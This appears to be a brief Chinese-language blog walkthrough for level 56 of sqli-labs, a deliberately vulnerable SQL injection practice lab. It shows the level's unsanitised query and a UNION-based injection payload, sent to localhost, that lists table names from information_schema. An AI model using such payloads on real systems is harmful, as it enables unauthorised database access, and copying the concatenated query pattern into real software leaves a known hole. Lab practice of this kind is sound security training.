Sqli-labs less 56
Less-56
与less54.55形式是一致的,我们关注sql语句,
$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";
因此给出示例payload
http://127.0.0.1/sqli-labs/Less-56/index.php?id=-1')union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+
微信公众号:埋头干安全
目前主要精力放在微信公众号!!!